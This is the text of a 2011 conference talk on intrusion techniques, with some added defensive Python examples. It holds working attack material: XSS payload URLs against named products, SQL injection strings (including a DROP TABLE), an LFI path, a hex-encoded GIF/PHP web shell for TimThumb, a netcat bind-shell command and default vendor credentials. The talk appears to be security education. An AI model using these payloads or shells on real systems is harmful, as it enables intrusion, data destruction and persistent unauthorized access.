Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
Intrusion Techniques - DcLabs Hacking Tour 2011
Agenda
Fingerprint, Vulnerabilities, Backdoors, Brute force, Shellcode, Exploits, Scanners
FingerPrint
The best tool for discovering operating systems, services, devices and more: NMAP (Network Mapper)
Basic commands:
nmap host (basic scan)
nmap -sV host (service versions)
nmap -PN host (skip host discovery; treat the host as up even without an ICMP echo reply)
nmap -O host (try to detect the O.S. version)
nmap -f host (fragment packets for firewall/IDS/IPS evasion)
Fingerprinting gathers information about a target host: for example, it identifies the operating system and/or service (daemon) version numbers from the unique characteristics of the host's TCP/IP responses.
Passive - FingerPrint
• TTL - the Time To Live value the operating system sets on outbound packets.
• Window Size - the TCP window size the operating system sets.
• DF - whether the operating system sets the Don't Fragment bit.
• TOS - whether the operating system sets the Type of Service, and if so, to what value.
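As an added illustration (not from the original slides), this Python snippet parses a raw IPv4+TCP SYN header, pulls out exactly the four fields listed above, and matches TTL, window size and DF against a small signature table. The signature values and the sample packet are constructed for the example; real passive fingerprinters carry much larger databases.

```python
import struct

# Constructed, illustrative signature table: initial TTL, TCP window size, DF bit.
# Real passive fingerprinters (e.g. p0f) ship much larger and more precise databases.
SIGNATURES = [
    {"os": "Linux 2.6 (example)",  "ttl": 64,  "win": 5840,  "df": True},
    {"os": "Windows XP (example)", "ttl": 128, "win": 65535, "df": True},
    {"os": "Solaris 8 (example)",  "ttl": 255, "win": 8760,  "df": True},
]

def parse_ip_tcp(pkt: bytes) -> dict:
    """Extract the four passive-fingerprint fields from a raw IPv4 + TCP header."""
    ihl = (pkt[0] & 0x0F) * 4                      # IPv4 header length in bytes
    tos = pkt[1]                                   # Type of Service byte
    flags_frag = struct.unpack("!H", pkt[6:8])[0]
    df = bool(flags_frag & 0x4000)                 # Don't Fragment bit
    ttl = pkt[8]
    if pkt[9] != 6:                                # protocol 6 == TCP
        raise ValueError("not a TCP segment")
    win = struct.unpack("!H", pkt[ihl + 14:ihl + 16])[0]   # TCP window size
    return {"ttl": ttl, "df": df, "tos": tos, "win": win}

def initial_ttl(observed: int) -> int:
    """Round the observed TTL up to the nearest common starting value."""
    for start in (32, 64, 128, 255):
        if observed <= start:
            return start
    return 255

def guess_os(fields: dict) -> tuple:
    """Return (best matching OS label, estimated hop count from the sender)."""
    start = initial_ttl(fields["ttl"])
    hops = start - fields["ttl"]
    for sig in SIGNATURES:
        if (sig["ttl"], sig["win"], sig["df"]) == (start, fields["win"], fields["df"]):
            return sig["os"], hops
    return "unknown", hops

# Constructed sample: a SYN from 10.0.0.1 to 10.0.0.2, TTL 60 (64 minus 4 hops),
# DF set, window 5840, no TCP options, checksums left at zero.
SAMPLE_SYN = (
    struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0x1234, 0x4000, 60, 6, 0,
                bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    + struct.pack("!HHIIBBHHH", 40000, 80, 1, 0, 0x50, 0x02, 5840, 0, 0)
)

if __name__ == "__main__":
    print(guess_os(parse_ip_tcp(SAMPLE_SYN)))   # ('Linux 2.6 (example)', 4)
```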
FingerPrint - Matrix (figure)
FingerPrint - U. Bourne (figure)
FingerPrint
In BackTrack Linux you can find many tools for fingerprinting.
http://www.backtrack-linux.com
Web Vulnerability
Cross Site (XSS) – Reflected / Stored
SQL-Injection
PHP (LFI / RFI/ AFU / RCE)
These vulnerabilities are typically exploited through malicious browser requests, compromising the target in a matter of minutes.
Web Vulnerability
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users.
Spekx – Knowledge Base - http://server/pls/ksp_acesso.login_script?p_time=%221%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
LMS Web Ensino – TOTVS
http://site/lms/sistema/webensino/index.php?modo=resbusca_biblioteca&pChave=a%22%2F%3E+%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&Submit=Buscar
Web Vulnerability
Reflected / Stored XSS
DEMO
Web Vulnerability
What is the impact?
Why?
Examples?
Web Vulnerability - SQL-Injection
It occurs when an attacker can insert SQL statements into a query by manipulating the application's input data.
SELECT campos FROM tabela WHERE campo = '[email protected]';
Inject string: some' OR 'x'='x
Resulting query: SELECT fields FROM table WHERE field = 'some' OR 'x'='x';
Common test strings:
admin'--
" or 0=0 #
' or 1=1--
hi' or 'a'='a
' or 0=0 --
or 0=0 #
" or 1=1--
hi') or ('a'='a
" or 0=0 --
' or 'x'='x
or 1=1--
hi") or ("a"="a
or 0=0 --
" or "x"="x
' or a=a--
');Drop table x;--
' or 0=0 #
') or ('x'='x
hi" or 1=1 --
') or ('a'='a
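To show why the injected string above changes the query's meaning, here is an added Python example (not from the slides) that runs the vulnerable string-concatenated query and its parameterized replacement against an in-memory SQLite table; the table and its rows are constructed for the example.

```python
import sqlite3

# Constructed sample table standing in for the slide's "tabela".
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, email TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "alice@example.com"), ("bob", "bob@example.com")])
    return con

def lookup_vulnerable(con: sqlite3.Connection, email: str) -> list:
    # Input is pasted straight into the SQL text, so a quote in it closes the
    # literal and the rest is parsed as SQL (the pattern shown on the slide).
    sql = "SELECT name FROM users WHERE email = '" + email + "'"
    return sorted(r[0] for r in con.execute(sql))

def lookup_safe(con: sqlite3.Connection, email: str) -> list:
    # Parameter binding: the driver passes the value separately from the SQL,
    # so the same string is compared as plain data and matches no row.
    sql = "SELECT name FROM users WHERE email = ?"
    return sorted(r[0] for r in con.execute(sql, (email,)))

INJECT = "some' OR 'x'='x"   # injection string from the slide

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, INJECT))   # ['alice', 'bob']  (WHERE is always true)
    print(lookup_safe(db, INJECT))         # []
```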
SQL-Injection
LIVE DEMO: OCOMON - Throwing fudge at the fan
Web Vulnerability - CGI/PHP Command Injection
It occurs when the attacker inserts a series of commands by exploiting vulnerable CGI/PHP scripts.
OneorZero – AFU + LFI
http://server/oneorzero/index.php?controller=../[FILE].php
WordPress TimThumb (Theme) Plugin – RCE
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
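The TimThumb payload on the slide is a valid 1x1 GIF89a image followed by PHP code, so an upload check that only looks at magic bytes accepts it. The added Python example below (not from the slides) shows that naive check beside a stricter one; the sample files are constructed here, and the appended PHP is a harmless marker rather than the slide's eval().

```python
# Constructed samples. CLEAN_GIF is a complete 1x1 GIF89a (the same header bytes
# the slide's payload starts with); POLYGLOT appends PHP after the GIF trailer
# byte (0x3B) the way the TimThumb payload does, but with a harmless marker.
CLEAN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
             b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00"
             b"\x02\x02D\x01\x00;")
POLYGLOT = CLEAN_GIF + b"\x00<?php echo 'marker'; ?>\x00"

MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")

def looks_like_image(data: bytes):
    """Naive check: trust the magic bytes only. Returns the format name or None."""
    for magic, fmt in MAGIC.items():
        if data.startswith(magic):
            return fmt
    return None

def contains_script(data: bytes) -> bool:
    """Scan the whole file, case-insensitively, for server-side script markers."""
    lowered = data.lower()
    return any(marker in lowered for marker in SCRIPT_MARKERS)

def accept_upload(data: bytes) -> bool:
    """Stricter policy: known image format AND no script markers anywhere.
    Re-encoding through a real image decoder and storing uploads where the web
    server never executes scripts are stronger mitigations on top of this."""
    return looks_like_image(data) is not None and not contains_script(data)

if __name__ == "__main__":
    print(looks_like_image(POLYGLOT))                          # 'gif' (fooled)
    print(accept_upload(CLEAN_GIF), accept_upload(POLYGLOT))   # True False
```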
Default/Weak passwords
Default passwords are set by the manufacturer/developer and are not changed after installation/configuration.
They are supplied by the system vendor and meant to be changed at installation time (nobody does this shit).
Ex: 3Com switch: User: security - Pass: security
FireBird: User: sysdba - Pass: masterkey
Weak: passwords that are easily guessed or follow a keyboard sequence. Ex: 123456 - Love - home phone number - birthday - etc.
Brute Force
It consists of trying combinations of characters, numbers and symbols, wordlists and/or string generators to crack a password.
Ex: John the Ripper, Hydra, SSH brute force
Brute Force - DirBuster
DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers.
Exploits
Kinds of exploits:
Local: usually the objective of a local exploit is to elevate the user's privileges on the machine as close as possible to root (uid=0) or Administrator. They are written to exploit kernel bugs or suid binaries.
Remote: works over a network connection and exploits the vulnerable target without any prior access to it.
www.securityfocus.com
www.secunia.com
www.exploit-db.com
0Days: usually an unpublished exploit for a brand-new vulnerability. You can buy them! $$$$$
Exploits
If the kernel was patched, will we cry?
Alexos =>
Exploits
No!!!! Fuck him!!! We have other ways to pwn the box:
GNU C library dynamic linker
Suid's
Etc...
Backdoors/RootKits
Used to maintain access to the system.
We can use Netcat for this purpose: nc -vlp 5555 -e /bin/bash
PHP - ASP - JSP
RootKits
The main purpose of a rootkit is to hide the attacker's presence by replacing vital system binaries on the target's system. Examples:
Hide files (matching given strings)
Run a command when a string matches
Hide processes
Hide open ports, and others.
Scanners/Fuzzers
There are two types of scanners: specific ones, written for a specific vulnerability (BSQLHacker, SQLMAP), and generic ones, written for various kinds of vulnerabilities. Generic scanners use known service banners/strings to locate potential targets/vulnerabilities.
W3af
Nessus
Sniffers
A sniffer monitors and analyzes network traffic. Some of these packets may contain critical information (such as logins, passwords and other interesting info).
Wireshark
MetaSploit
Let's Fuck Windows?
Hardening your server
HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files allowing you to get a quick overview of the security status of your system.
Questions?
Contact
Crash - [email protected]
Irc: irc.freenode.net #dclabs
twitter: @crashbrz
Recommended